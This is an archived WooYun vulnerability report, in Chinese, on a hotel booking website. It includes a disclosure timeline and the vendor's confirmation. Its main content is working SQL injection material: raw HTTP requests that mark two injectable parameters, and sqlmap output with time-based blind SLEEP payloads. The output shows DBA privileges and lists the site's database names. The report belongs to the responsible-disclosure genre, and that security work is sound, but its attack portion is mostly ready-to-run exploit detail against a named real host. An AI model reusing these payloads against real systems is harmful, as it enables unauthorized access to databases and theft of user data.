乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-23: 细节已通知厂商并且等待厂商处理中 2015-12-27: 厂商已经确认,细节仅向厂商公开 2016-01-06: 细节向核心白帽子及相关领域专家公开 2016-01-16: 细节向普通白帽子公开 2016-01-26: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
2333
GET /order.html?available=&display=&hname=&hotelid=&id=&personcome=*&unmember=1 HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://fanmei.zhuzher.com:80/Cookie: JSESSIONID=CDDFBEDD30FED12CEF0EDD334B2E874CHost: fanmei.zhuzher.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
参数 personcome 可注入
看了下权限 DBA 权限
另一处 SQL注入点:
GET /hotelList.html?searchHotel.cityid=2&searchHotel.enddate=2015-12-24&searchHotel.personcome=*/&searchHotel.startdate=2015-12-23&searchHotel.town= HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://fanmei.zhuzher.com:80/Cookie: JSESSIONID=CDDFBEDD30FED12CEF0EDD334B2E874CHost: fanmei.zhuzher.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
参数 searchHotel.personcome 可注入
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://fanmei.zhuzher.com:80/hotelList.html?searchHotel.cityid=2&searchHotel.enddate=2015-12-24&searchHotel.personcome=' AND (SELECT * FROM (SELECT(SLEEP(5)))MwmI) AND 'uAsb'='uAsb/&searchHotel.startdate=2015-12-23&searchHotel.town=---[15:45:41] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[15:45:41] [INFO] fetching database names[15:45:41] [INFO] fetching number of databases[15:45:41] [INFO] retrieved:[15:45:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y5[15:46:48] [INFO] retrieved:[15:47:18] [INFO] adjusting time delay to 2 seconds due to good response times[15:48:20] [ERROR] invalid character detected. retrying..[15:48:20] [WARNING] increasing time delay to 3 seconds[15:49:52] [ERROR] invalid character detected. retrying..[15:49:52] [WARNING] increasing time delay to 4 secondsinfor
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://fanmei.zhuzher.com:80/order.html?available=&display=&hname=&hotelid=&id=&personcome=' AND (SELECT * FROM (SELECT(SLEEP(5)))tBpE) AND 'sgjo'='sgjo&unmember=1---[15:17:11] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[15:17:11] [INFO] fetching database names[15:17:11] [INFO] fetching number of databases[15:17:11] [INFO] retrieved:[15:17:11] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y5[15:17:26] [INFO] retrieved:[15:17:31] [INFO] adjusting time delay to 1 second due to good response timesinformatioa[15:18:46] [ERROR] invalid character detected. retrying..[15:18:46] [WARNING] increasing time delay to 2 seconds_schema[15:19:57] [INFO] retrieved: fanmei[15:20:46] [INFO] retrieved: haolaide[15:22:04] [ERROR] invalid character detected. retrying..[15:22:04] [WARNING] increasing time delay to 3 secondsng[15:22:35] [INFO] retrieved: mysql[15:23:44] [INFO] retrieved: testavailable databases [5]:[*] fanmei[*] haolaideng[*] informatioa_schema[*] mysql[*] test[15:24:40] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 503 times[15:24:40] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\fanmei.zhuzher.com'[*] shutting down at 15:24:40
危害等级:中
漏洞Rank:5
确认时间:2015-12-27 20:13
已确认
暂无